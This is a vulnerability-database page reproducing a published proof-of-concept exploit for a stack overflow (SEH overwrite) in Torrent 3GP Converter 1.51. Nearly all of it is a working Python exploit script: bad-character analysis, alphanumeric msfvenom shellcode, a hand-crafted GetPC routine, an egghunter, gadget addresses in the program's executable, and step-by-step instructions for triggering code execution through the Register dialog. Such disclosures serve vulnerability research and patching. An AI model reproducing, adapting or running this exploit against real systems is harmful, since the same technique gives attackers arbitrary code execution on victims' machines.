Vulners
Lucene search
Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
# 2) run python script & open created 'crash.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash
#!/usr/bin/python
# Bad Chars
# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer
# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper
# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper
# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e
# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6
# \xf8-\xfe => \xd8-\xde # \xff => \x9f
# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# Max shellcode size is 2384 bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_uppers GetPC Routine ##
# [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# 89E5 mov ebp, esp
shellcode = b'\x54\x5D' # push esp # pop ebp
# DBCD fcmovne st, st(5)
shellcode += b'\x89\xCF' # mov edi, ecx
# D975 F4 fstenv [ebp-C]
shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop
# 5F pop edi
shellcode += b'\x90' # nop
shellcode += b"\x57\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"
shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"
shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"
shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"
shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"
shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"
shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"
shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"
shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"
shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"
shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"
shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"
shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"
shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"
shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"
shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"
shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"
shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"
shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"
shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"
shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"
shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"
shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"
shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"
shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"
shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"
shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"
shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"
# Stack EggHunter for fun & profit
egg = 'BOKU'
hunterOS = '\x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter += '\x5B' # pop ebx / EBX=PC
hunter += '\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter += '\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55
hunter += '\x54' # push esp
hunter += '\x59' # pop ecx
hunter += '\x90'*18 # nop fillers for jnz short -7 loop
hunter += '\x49' # dec ecx
hunter += '\x3B\x01' # cmp eax, [ecx]
hunter += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars
hunter += '\x51' # push ecx
hunter += '\x5a' # pop edx
hunter += '\x4a'*4 # dec edx * 4 / check if second egg matchs
hunter += '\x3B\x02' # cmp eax, [edx]
hunter += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs
hunter += '\x31\xd2' # xor edx,edx
hunter += '\x52' # push edx
hunter += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b
hunter += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44
hunter += '\xC6\x04\x24\x39' # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)
hunter += '\xc3' # ret
huntRmdr = '\x41'*(88-len(hunter))
nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH = '\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE}
payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH
try:
f=open("crash.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jan 2020 00:00Current
7.4High risk
Vulners AI Score7.4